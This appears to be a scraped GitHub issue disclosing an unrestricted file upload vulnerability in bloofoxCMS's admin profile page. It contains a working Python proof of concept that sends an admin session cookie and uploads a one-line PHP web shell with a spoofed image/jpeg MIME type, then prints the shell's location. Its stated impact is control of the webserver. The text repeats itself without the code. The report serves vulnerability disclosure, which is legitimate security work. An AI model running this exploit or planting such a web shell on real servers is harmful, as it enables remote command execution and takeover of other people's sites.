I found Unrestricted File Upload in http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID] -> filename param, the filename param only checks the MIME type which that can be bypassed.
PoC :-
importrequestssid='xxxxxxxxxxxxxxxxxxxxxxxxxx'# The Admin Sessionurl="http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile"data= {'username':'admin','send':'Save'}
r=requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0]
print('Your Shell in http://localhost/bloofoxCMS//admin/media/images/profiles/'+r)
Impact
Upload Backdoor PHP Files that leads to control the victim webserver
The text was updated successfully, but these errors were encountered:
I found Unrestricted File Upload in
http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID]->filenameparam, thefilenameparam only checks the MIME type which that can be bypassed.PoC :-
Impact
Upload Backdoor PHP Files that leads to control the victim webserver
The text was updated successfully, but these errors were encountered: